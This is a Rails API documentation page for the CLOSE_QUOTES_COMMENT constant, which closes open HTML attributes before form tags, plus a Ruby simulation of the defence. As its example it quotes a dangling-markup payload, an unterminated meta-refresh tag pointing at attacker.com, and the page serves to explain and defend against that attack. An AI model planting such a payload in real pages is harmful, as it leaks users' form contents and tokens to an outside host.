constant CLOSE_QUOTES_COMMENT

Ruby on Rails 8.0.4

Since v7.1.6

Available in: v7.1.6 v7.2.3 v8.0.4 v8.1.2

Close any open attributes before each form tag. This prevents attackers from injecting partial tags that could leak markup offsite.

For example, an attacker might inject:

<meta http-equiv="refresh" content='0;URL=https://attacker.com?

The HTML following this tag, up until the next single quote, would be sent to https://attacker.com. By closing any open attributes, we ensure that form contents are never exfiltrated this way.
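To show why closing the open attribute matters, this added example (not Rails' own code) models how an HTML tokenizer reads the unterminated single-quoted attribute from the injection above, with and without a quote-closing comment ahead of the form. The `CLOSER` string, the sample form, the token value and the helper names are assumptions made for illustration; the page does not show the constant's value.

```ruby
# Illustrative stand-in for the markup emitted before a form tag.
# Assumption: the real constant's value is not shown on this page.
CLOSER = %q(<!-- '"` -->)

# Injection from the page's example: the content attribute is opened
# with a single quote and never closed.
INJECTED = %q(<meta http-equiv="refresh" content='0;URL=https://attacker.com?)

# Constructed sample form carrying a value that must stay on the page.
FORM = %q(<form action="/transfer" method="post">) +
       %q(<input type="hidden" name="authenticity_token" value="SECRET-TOKEN">) +
       %q(</form><p>It's done</p>)

# Simplified model of attribute tokenizing: a quoted value runs from the
# opening quote to the next matching quote, whatever markup lies between.
# Returns nil when the quote is never closed (the tag is then dropped).
def attribute_value_after(html, opener, quote)
  start = html.index(opener)
  return nil unless start
  start += opener.length
  stop = html.index(quote, start)
  stop ? html[start...stop] : nil
end

# Build the page around the injection and return what the browser would
# treat as the value of the injected content attribute.
def captured_by_injection(protect:)
  html = "<p>Comment: " + INJECTED + "</p>" + (protect ? CLOSER : "") + FORM
  attribute_value_after(html, "content='", "'")
end

puts "without closer: #{captured_by_injection(protect: false)}"
puts "with closer:    #{captured_by_injection(protect: true)}"
```

Without the closer, the captured value runs through the hidden input to the apostrophe in "It's"; with it, the value ends inside the comment, before the form begins.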
